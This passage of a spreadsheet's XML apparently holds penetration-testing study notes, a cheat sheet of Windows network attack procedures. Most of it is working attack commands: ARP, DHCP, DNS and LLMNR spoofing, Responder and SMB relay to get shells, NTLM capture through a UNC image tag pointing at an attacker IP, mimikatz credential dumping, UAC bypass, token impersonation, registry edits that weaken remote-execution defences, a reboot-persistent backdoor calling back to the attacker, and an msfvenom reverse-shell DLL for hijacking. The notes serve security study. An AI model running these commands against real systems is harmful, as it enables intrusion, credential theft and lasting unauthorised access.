Reply: An ARP reply that has been sent without being requested. 
Can be used for ARP poisoning
</t>
  </si>
  <si>
    <t xml:space="preserve">ARP Poisoning Information:
2 ways to mount an attack: 
Host Poisoning
MiTM -&gt; forge gratuitous arp reply packets and send to both targets. Packets passes through the attacker.
Gateway Poisoning
Attacker sends gratuitous arp replies saying that he is the default gateway for the network. Attacker obtains all data with a foreign destination address and then passes it to the real gateway. 
</t>
  </si>
  <si>
    <t>Wireshark</t>
  </si>
  <si>
    <t>http.authbasic
in the filter field</t>
  </si>
  <si>
    <t>Captures packets containing creds sent to a web app on 80/8080 ...</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t xml:space="preserve">New host connects to the network, it sends out a DHCP Discovery broadcast packet (IP = 0.0.0.0, MAC = FF:FF...). 
DHCP Server responds with a DHCP Offer packet - still broadcasts across the whole network for everyone to see
Client responds with another bcast packet - DHCP REQUEST. DHCP Clients choose the best offer to the lease time attribute in the DHCP Offer (the longer, the better). 
DHCP server that is the winner sends a DHCPPACK packet in broadcast and the client uses that IP. 
TO EXPLOIT: 
Attacker has to send a DHCPOFFER with a greater lease time than the real DHCP server. We can also set ourselves as the default gateway. 
</t>
  </si>
  <si>
    <t>NBT-NS/ LLMNR Spoofing/ Poisoning</t>
  </si>
  <si>
    <t xml:space="preserve">NetBIOS Name Service
Link-Local Multicast Name Resolution
Both are good to capture users' NTLMv1, NTLMv2 or LM (Lan Manager) hashes through a MiTM attack.
These protocols allow machines in a windows based network to find one another - fallback for when DNS does not work.  </t>
  </si>
  <si>
    <t xml:space="preserve">Prerequisite:
SMB Signing must be disabled on the workstations. </t>
  </si>
  <si>
    <t>Responder/ MultiRelay</t>
  </si>
  <si>
    <t xml:space="preserve">Responder works by listening for LLMNR or NBT-NS broadcast addresses and spoofs responses to targeted hosts, intercepting hashes which we can send to other systems or crack offline. 
MultiRelay relays hashes to other machines on the LAN and can provide us a shell if successful. </t>
  </si>
  <si>
    <t>RunFinger.py</t>
  </si>
  <si>
    <t>python RunFinger.py -i &lt;target_ip&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Determines if SMB Signing has been enabled or disabled on a target. </t>
  </si>
  <si>
    <t xml:space="preserve">Process:
1. Modify the Responder.conf file and diasble the SMB Server and HTTP server to Off. 
2. Launch responder.py 
python Responder.py -I &lt;network interface i.e. tap0 for a vpn or eth0 for local&gt; --lm
3. Launch MultiRelay in another window
python MultRelay.py -t &lt;target_ip&gt; -u ALL
A successful hash relay will result in a MultiRelay shell. </t>
  </si>
  <si>
    <t>Cain &amp; Abel</t>
  </si>
  <si>
    <t xml:space="preserve">Netowrk sniffer and attack tool. </t>
  </si>
  <si>
    <t>arpspoof</t>
  </si>
  <si>
    <t xml:space="preserve">Process:
0: sudo echo 1 &gt; /proc/sys/net/ipv4/ip_forward &lt;- this forwards the traffic throuh our host. 
1. Identify victim MAC
2. Run the below:
sudo arpspoof -i tap0 -t &lt;victim_ip&gt; -r &lt;spoof_ip i.e gateways ip&gt; 
The above command is telling the victim IP and our MAC address correlates to the gateway IP. i.e. We are spoofing the gateway mac. 
3. Then use wireshark to check out the traffic 
THIS IS ONLY HALF THE ATTACK. WE MUST DO THE SAME THIS TO THE GATEWAY I.E. JUST DO THE OPPOSITE OF THE ABOVE COMMAND. </t>
  </si>
  <si>
    <t>Ettercap</t>
  </si>
  <si>
    <t>Intercepting SSL Traffic</t>
  </si>
  <si>
    <t xml:space="preserve">Decrypt Encrypted Traffic:
1. Open /etc/ettercap/etter.conf
2. Change the ec_udi and ec_gid to 0
3. Under redir_command_on/off, uncomment the redir_command lines according to the OS 
4. Run the arp poison attack and sniff victim traffic -&gt; ettercap can now intercept some creds. 
</t>
  </si>
  <si>
    <t>use auxiliary/scanner/smb/smb1</t>
  </si>
  <si>
    <t>Scan for smb version 1
IF SMBv1 dialect enabled, we can use ms17_010 (eternalblue)</t>
  </si>
  <si>
    <t>netdiscover</t>
  </si>
  <si>
    <t>ARP Scan on VPN</t>
  </si>
  <si>
    <t>netdiscover -i &lt;NIC i.e.tap0&gt; -r &lt;target_ip_range&gt;</t>
  </si>
  <si>
    <t>nmap -PR -sn &lt;ip_range i.e 10.10.10.*&gt;</t>
  </si>
  <si>
    <t>dig</t>
  </si>
  <si>
    <t>Zone Transfer</t>
  </si>
  <si>
    <t>dig @&lt;DNS_IP&gt; &lt;domain name&gt; -t AXFR +nocookie</t>
  </si>
  <si>
    <t xml:space="preserve">Use this to discover new hosts. </t>
  </si>
  <si>
    <t>Default Gateway</t>
  </si>
  <si>
    <t xml:space="preserve">route -n </t>
  </si>
  <si>
    <t>Identify the default gateway in a network</t>
  </si>
  <si>
    <t>ncrack</t>
  </si>
  <si>
    <t>Low Hanging Fruits - Weak Passwords</t>
  </si>
  <si>
    <t>ncrack &lt;service i.e. Telnet&gt;://&lt;target_ip&gt;:&lt;portnumber i.e. 23&gt; -U &lt;username list&gt; -P &lt;password list&gt;</t>
  </si>
  <si>
    <t>Ncrack attempts to crack passwords on a number of services. 
/usr/share/ncrack for password and username lists</t>
  </si>
  <si>
    <t>Medusa</t>
  </si>
  <si>
    <t>Use HYDRA INSTEAD</t>
  </si>
  <si>
    <t xml:space="preserve">Similar to ncrack, but more services. </t>
  </si>
  <si>
    <t>NTLM</t>
  </si>
  <si>
    <t>NTLM/ LM</t>
  </si>
  <si>
    <t>NTLM/ LM Exploit Process</t>
  </si>
  <si>
    <t xml:space="preserve">1. Create a listening SMB server that will accept incoming connections and send back a fixed challenge. 
metasploit use/auxiliary/server/capture/smb
-&gt; JOHNPWFILE hashpwd - saves hashes to a file to crack with john the ripper
-&gt; Challenge code is standard - use 8 byte rainbow tables to crack the hash
-set a payload - windows/meterpreter/reverse_tcp
2. Force the client to connect to us.
Embed a Universal Naming Convention (UNC) path into an email message or webpage. 
&lt;img src="\\&lt;attackerserver_ip&gt;\&lt;share&gt;"&gt;
3. Capture hash and feed into john or use rainbow tables and rcracki_mt as below
John: john --format=netlm &lt;hashfile&gt;
rcracki: rcracki_mt -h &lt;first 8 bytes of the hash&gt; -t &lt;threads to use&gt; &lt;rainbow table&gt;
4. IF using rcracki, only the first half of the password will be cracked. We need to brute force the second half.
metasploit -&gt; use halflm_second.rb script 
ruby &lt;script&gt; -n
&lt;complete hash&gt; -p &lt;first half of discovered password&gt;
Use the netntlm.pl script in the john folder to obtain the correct case sensitive password
perl netntlm.pl -file &lt;hashfile&gt; -seed &lt;password found in uppercase&gt;
</t>
  </si>
  <si>
    <t>http://project-rainbowcrack.com/table.htm
https://github.com/foreni-packages/rcracki_mt</t>
  </si>
  <si>
    <t>SMB Relay Attack</t>
  </si>
  <si>
    <t xml:space="preserve">1. Set up the SMB Relay exploit on Metasploit
use exploit/windows/smb/smb_relay
Ensure smbhost and lhost are the same ip
RUN the exploit
2. Set up dnsspoof
echo "&lt;attacker_ip&gt;" *.&lt;domainyouwishtospoof that the target host is attempting to connect to with SMB&gt; &gt; dns
Run dnsspoof
dnsspoof -i tap0 -f dns (the above file)
3. Set up arpspoof
Spoof between the target and the dns server/ or the gateway which may be sitting in front of the dns server
echo 1 &gt; /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 &lt;target_ip&gt; &lt;dns server or gateway ip&gt;
arpspoof -i tap0 &lt;dns server or gateway ip&gt; &lt;target_ip&gt; &lt;-reverse to conduct sniffing on both routes
4. The SMB server will capture credentials and launch a meterpreter shell on each request. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Attacker acts like man in the middle. 
metasploit use exploit/windows/smb/smb_relay
set payload as windows/meterpreter/reverse_tcp
Wait for sometone to connect to our machine. </t>
  </si>
  <si>
    <t>Psexec</t>
  </si>
  <si>
    <t>use auxiliary/scanner/smb/psexec_scanner</t>
  </si>
  <si>
    <t>metasploit use exploit/windows/smb/smb_relay</t>
  </si>
  <si>
    <t>DNSEnum</t>
  </si>
  <si>
    <t>perl dnsenum.pl -&lt;options&gt; &lt;domain&gt; 
/usr/share/dnsenum</t>
  </si>
  <si>
    <t>set payload as windows/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>DNS Process</t>
  </si>
  <si>
    <t>Reverse DNS Lookup</t>
  </si>
  <si>
    <t>dig @&lt;target_ip(hosting the dns server on 53)&gt; -x &lt;same_ip&gt; +nocookie</t>
  </si>
  <si>
    <t xml:space="preserve">Wait for sometone to connect to our machine. </t>
  </si>
  <si>
    <t>DNS Zone Transfer</t>
  </si>
  <si>
    <t>dig @&lt;target_ip(hosting the dns server on 53)&gt; -t AXFR &lt;network_domain_name(not a subdomain) i.e. Sportsfoo.com&gt; +nocookie</t>
  </si>
  <si>
    <t>This will perform a zone transfer and give you a list of all subdomains within the domain, and their ip addresses. 
This is a way to discover new hosts in the network that may be hidden etc. 
**NOTE: Sometimes zone transfer will fail. Therefore we must brute force the subdomains</t>
  </si>
  <si>
    <t>Fierce</t>
  </si>
  <si>
    <t>DNS Zone Transfer Brute Force</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Shell Script</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
for name in $(cat /usr/share/fierce/hosts.txt); do host $name.&lt;domain_name i.e.sportsfoo.com&gt; &lt;target_ip_dns(forthedomainname) i.e. 172.16.5.10&gt; -W 2; done | grep 'has address'</t>
    </r>
  </si>
  <si>
    <t>https://github.com/mschwager/fierce
In this example we are just usuing fierce's host name list in a script</t>
  </si>
  <si>
    <t>#!/bin/bash for ip in $(cat iplist.txt); do dig @172.16.5.10 -x $ip +nocookie; done
iplist.txt will hold all the ips would want to check</t>
  </si>
  <si>
    <t>If we know the IP range, we can just perform a reverse dns lookup on each IP to find the hostname. 
Remember to chmod +x the script</t>
  </si>
  <si>
    <t>https://netsec.ws/?p=278</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Hashdump</t>
  </si>
  <si>
    <t>Dsniff</t>
  </si>
  <si>
    <t xml:space="preserve">DNS Spoofing </t>
  </si>
  <si>
    <t>Set up dnsspoof
echo "&lt;attacker_ip&gt;" *.&lt;domainyouwishtospoof that the target host is attempting to connect to with SMB&gt; &gt; dns
Run dnsspoof
dnsspoof -i tap0 -f dns (the above file)
We can use nmap -sT to identify dns servers. Try -sU also incase...</t>
  </si>
  <si>
    <t>We can use nmap -sT to identify dns servers. Try -sU also incase...</t>
  </si>
  <si>
    <t>background the session in the windows shell
background
use post/multi/manage/shell_to_meterpreter
Set session u want to change
Set lhost to your host on the vpn
NOW
On the meterpreter session, run getsystem 
this will upgrade you to SYSTEM
Check via shell-&gt;whoami</t>
  </si>
  <si>
    <t xml:space="preserve">Convert a standard windows shell to a meterpreter shell. 
</t>
  </si>
  <si>
    <t>Process Migration</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">METERPRETER SHELL:
Check our current processid (PID) 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">getpid
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">List the processes 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">ps
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Migrate to the selected process
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">migrate &lt;PID&gt; 
</t>
    </r>
  </si>
  <si>
    <t>Online</t>
  </si>
  <si>
    <t>Hash Cracking</t>
  </si>
  <si>
    <t xml:space="preserve">1. Identify the type of hash it is i.e. Hashdump gives us hashes from lm/ntlm
2. Use a hash cracker to grab password 
Use Crackstation.net -&gt; does it instantly. Only for unsalted hashes however. </t>
  </si>
  <si>
    <t>Crackstation.net</t>
  </si>
  <si>
    <t>Find Hostname</t>
  </si>
  <si>
    <t>nmap -sC</t>
  </si>
  <si>
    <t xml:space="preserve">Find host name from nmap </t>
  </si>
  <si>
    <t xml:space="preserve">ps </t>
  </si>
  <si>
    <t>List all processes</t>
  </si>
  <si>
    <t>systeminfo or sysinfo</t>
  </si>
  <si>
    <t>List system info such as OS build etc.
On meterpreter session</t>
  </si>
  <si>
    <t>Exploit Suggester</t>
  </si>
  <si>
    <t>use post/multi/recon/local_exploit_suggester</t>
  </si>
  <si>
    <t>Suggests exploits for priv escs</t>
  </si>
  <si>
    <t>getprivs</t>
  </si>
  <si>
    <t>Shows current privs in meterpreter</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>HashDump</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">In meterpreter:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>load kiwi 
or
load mimikatz
*NOTE; IN ORDER TO RUN MIMIKATZ WE NEED TO BE AN ADMIN
Put hashes into hashcat
hashcat -m 1000 --force &lt;hash&gt; &lt;rockyou.txt&gt;</t>
    </r>
  </si>
  <si>
    <t>Use help in meterpreter to show the kiwi commands, which should be added now. 
Kiwi is the updated version
https://www.offensive-security.com/metasploit-unleashed/mimikatz/</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>golden_ticket_create</t>
  </si>
  <si>
    <t xml:space="preserve">Allows us to generate a golden kerberos ticket and maintain persistence as any user on the domain.
Follow the below for a walkthrough:
https://www.hackingarticles.in/domain-persistence-golden-ticket-attack/ </t>
  </si>
  <si>
    <t>3389 - RDP</t>
  </si>
  <si>
    <t xml:space="preserve">1. use/post/windows/manage/enable_rdp
Set the session as your compromised box
Run, this will enable RDP on the compromised box 
Use xfreerdp to connect to the box via your attacker machine
</t>
  </si>
  <si>
    <t>Connect to another machine with windows credentials, even if the RDP port is not open on the compromised box.</t>
  </si>
  <si>
    <t>Privilege Escalation Awesome Scripts Suite</t>
  </si>
  <si>
    <t>https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite</t>
  </si>
  <si>
    <t>getsystem</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">On Meterpreter:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">getsystem
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Run bypassuac if doesnt work, then use the new meterpreter session to run getsystem and get system privs yeow</t>
    </r>
  </si>
  <si>
    <t>We can easily get SYSTEM Privs via running getsystem in meterpreter
getsystem tries all techniques to escalate privileges. 
If UAC is enabled, getsystem will fail!</t>
  </si>
  <si>
    <t>High priority
Privilege_Escalation_1</t>
  </si>
  <si>
    <t>migrate &lt;ProcessID&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We migrate processes to ensure our session remains active if a user closes the exploit. </t>
  </si>
  <si>
    <t>ps</t>
  </si>
  <si>
    <t xml:space="preserve">Check running processes on the box. </t>
  </si>
  <si>
    <t>Bypass UAC</t>
  </si>
  <si>
    <t xml:space="preserve">1. Verify if UAC is enabled by running the metasploit module post/windows/gather/win_privs. If UAC Enabled column set to True, means that it is enabled. 
2. Search metasploit for bypassuac modules. Search bypassuac
3. Select a module and run attached to the target session. Should open a new session. 
4. Run getsystem in the new meterpreter session. </t>
  </si>
  <si>
    <t>https://null-byte.wonderhowto.com/how-to/bypass-uac-escalate-privileges-windows-using-metasploit-0196076/</t>
  </si>
  <si>
    <t>UAC</t>
  </si>
  <si>
    <t>Incognito/ Windows Tokens</t>
  </si>
  <si>
    <t xml:space="preserve">In meterpreter:
1.use incognito
If it works, new commands will be added to the meterpreter help menu.
2. list_tokens -u to show the list of available users we can impersonate i.e. Els\user
3. To impersonate, run the below:
impersonate_token &lt;name i.e. els\\user&gt; -&gt; ensure you use double slashes in windows when using linux shell
</t>
  </si>
  <si>
    <t xml:space="preserve">We can use incognito to impersonate other valid user tokens on that machine, and become that user. 
Through this we can access new domain resources, etc. </t>
  </si>
  <si>
    <t>wmic</t>
  </si>
  <si>
    <t xml:space="preserve">Unquoted Service Paths </t>
  </si>
  <si>
    <t>Use the below wmic query to find unquoted service paths.
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """</t>
  </si>
  <si>
    <t>Abuse the way Windows searches for executables belonging to a service. I.e. Abuse the search order. Issue arises when a windows service has been configured with a path to a service binary which is unquoted (lierally without quotes around the file path). 
If unquoted, windos will search for the binary from the highest (C:\) directory down to the lowest. 
If we have permissions to write to any of these directories, we can place our own binary (named the same as the one in the directory) and when the service is launched it will execute our binary instead. 
We get the same permissions as what the service runs as i.e. if the service runs as SYSTEM, we get a SYSTEM shell</t>
  </si>
  <si>
    <t>use exploit/windows/local/unquoted_service_path</t>
  </si>
  <si>
    <t xml:space="preserve">Automatically exploit USP </t>
  </si>
  <si>
    <t xml:space="preserve">Best way is to either use metasploit modules, or get the Linux OS version and search for exploits on the internet. 
Use sysinfo on the shell. 
Download the source code, compile it, and transfer to the shell. </t>
  </si>
  <si>
    <t>File Upload</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Upload a file to the compromised machine via a meterpreter session
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>upload &lt;filepath_on_attacker_machine&gt;</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">We can maintain persistence on a machine via the below techniques:
- Password hash - Pass the hash/ Crack the hack
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">hashdump or run post/windows/gather/smart_hashdump
reuse the hash and try to connect to the machine -&gt; psexec module (use exploit/windows/smb/psexec
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">IF THE MODULE DOES NOT WORK DUE TO NO ACCESS ON THE SHARE, RUN THE BELOW REG HKEY
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1 </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-&gt; into meterpreter session
- Backdoor - starts a connection on machine reboot etc
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>metasploit -&gt; search persistence
use exploit/windows/local/persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
- New user - create a new user to log into via RDP, telnet etc...
</t>
    </r>
  </si>
  <si>
    <t>Note that some of the techniques require services for the connection. 
- Some of these services may not be activated
- We need credentials to use the service
- We need to add new users to the service...</t>
  </si>
  <si>
    <t>Password and Hashes - Maintaining Access and Persistence</t>
  </si>
  <si>
    <t xml:space="preserve">If we have SYSTEM privs and a meterpreter session, just run hashdump.
If does not work, migrate to a process with higher privs or run  run hashdump  in meterpreter. 
Once hashes gatherred, refer to Pass the Hash category field.
SOMETIMES PSEXEC WILL NOT WORK WITH AN ADMIN ACCOUNT -&gt; this is because the account is in the administrator group but not actually an admin (RID-500). To fix do the below:
Enter the below into the registry on the TARGET MACHINE:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-&gt; add a new DWORD (32-BIT) named LocalAccountTokenFilterPolicy and set the value to 1
AND
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters
-&gt; Add a new DWORD (32-BIT) named RequireSecuritySignature and set the value to 0
The above allows the psexec module to work in some cases. 
</t>
  </si>
  <si>
    <t>Check 6.2.1.1 for Powershell one liners to update the registry settings</t>
  </si>
  <si>
    <t>psexec
fix</t>
  </si>
  <si>
    <t>xfreerdp</t>
  </si>
  <si>
    <t>Pass the Hash - Over RDP</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">If we have NTLM hash we can use RDP to log into a machine. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>$ xfreerdp /u:&lt;username i.e. Admin&gt; /d:&lt;domain i.e. Foocorp&gt; /pth:&lt;ntlmm_hash&gt; /v:&lt;target_ip&gt;</t>
    </r>
  </si>
  <si>
    <t>Crack the Hash</t>
  </si>
  <si>
    <t>Once hashes are dumped, we can try to crack them and obtain passwords to login to active services running on the target machine.
Mimikatz is able to retrieve plain text passwrds for the machine, kerberos tickets, perform pass the hash attacks, etc.
We can use a meterpreter session as well with mimikatz. 
https://github.com/gentilkiwi/mimikatz/wiki</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ps -A x86_64 -s </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">to find a 64 bit process
Select one running 64bit
Switch the current process to that process via </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">migrate </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> in meterpreter. </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Migrate from a 32bit meterpreter session to a 64 bit one. Useful for mimikatz. </t>
  </si>
  <si>
    <t>RDP Access</t>
  </si>
  <si>
    <t>*Note - we can do this with multiple services -&gt; just look up the service and services group...</t>
  </si>
  <si>
    <t>Check Enabled Services</t>
  </si>
  <si>
    <t>net start</t>
  </si>
  <si>
    <t xml:space="preserve">Check which services are running. </t>
  </si>
  <si>
    <t>Privileges</t>
  </si>
  <si>
    <t xml:space="preserve">net localgroup "Administrators" &lt;username&gt; /add </t>
  </si>
  <si>
    <t xml:space="preserve">Add a standard user to the admin group on windows. </t>
  </si>
  <si>
    <t>Backdoors</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">meterpreter:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">run persistence -A -X (requires system privs - starts the backdoor when system reboots...) -i &lt;connection attempts (5)&gt; -p &lt;port to connect back&gt; -r &lt;attacker_ip&gt; 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>-&gt; the above will spit out a registry value which we can use to double check it is installed below:</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Double check changes:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVerson\\Run -v &lt;value after Run\&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">ls C:\\Windows\\TEMP\\&lt;first few chaacters of the backdoor exploit name&gt;*
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">If file is in there, all is good we can set up a nc or metasploit handler. Ensure you use the same port/ip as specified in the first run persistence script. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>THIS METASPLOIT SCRIPT ONLY WORKS AGAINST WINDOWS TARGETS</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Goal is to use Metasploit to generate an executable file that will persist through target machine reboots. Initiate a connect back backdoor, although bad because it will try to connect to the same ip each time - should not be an issue for ptp...
Refer to 6.2.3.1 for more info in ptp slides</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Manual Installation of Backdoor (w/o script):
Check slides 6.2.2.3.2 of ptp -&gt; still uses meterpreter so may as well use the script 
</t>
  </si>
  <si>
    <t>New Users</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Add a new user:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">net user &lt;username&gt; &lt;password&gt; /add
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Add a user to a group:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>net localgroup "&lt;group_name&gt; &lt;username&gt; /add
-&gt; join group to access services</t>
    </r>
  </si>
  <si>
    <t>DLL</t>
  </si>
  <si>
    <t>DLL Preloading/ Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Process to Identify Vulnerable DLL:
**REMEMBER TO RUN ALL APPLICATIONS AS ADMINISTRTATOR
1. Look at current processes on system on Process Explorer (proxexp)
- add users column to screen, to show which users own each process
- right click on columns and select column option
2. Look for third party applications that are running as system. Goal is to identify issues in the way that these applications load DLL files upon startup of the process. 
3. Double clikc the application and note the PATH of the binary/exe and check under the SERVICES tab what services the application runs under. *we will have to restart this service in order to run the process later on.
4. Go to the Process Monitor application (procmon)
- Filter -&gt; select process and enter in the binary/ exe found
5. Start the service associated with the process
- go to Services appl via search bar
- Find the related service 
- Click properties and check that the 'Path to executable' is the related process exe
- STOP AND START THE PROCESS then go to ProcMon to check if working
- IF DOES NOT WORK -&gt; RUN A CMD LINE ADMIN CONSOLE AND net start &lt;app/service&gt;
6. Look for the a DLL file below in procmon WHERE THE USER IS SYSTEM!!!!!
- Load Image dll
- Create File dll
Check to see if any have NAME NOT FOUND in the Result column. If so, we can exploit that path.  
Usually, after name not found occurs, the system will try another location which usually results in a success. We want to put our payload in the name not found path. 
7. Create a payload using msfvenom and name is the exact same DLL as the one the process is looking for but could not find.
msfvenom -p windows/meterpreter/reverse_https LHOST=&lt;attacker_ip&gt; LPORT =&lt;port&gt; -f dll &gt; vulnerableprocess.dll 
ENSURE THE PAYLOAD IS THE SAME ARCH AS THE PROCESS I.E. IF THE PROCESS IS 32 BIT, SPECIFY 32BIT IN MSFVENOM i.e 64 bit is windows/x64/meterpreter/reverse_https...
https://security.stackexchange.com/questions/83350/how-do-you-send-a-64-bit-meterpreter-stager
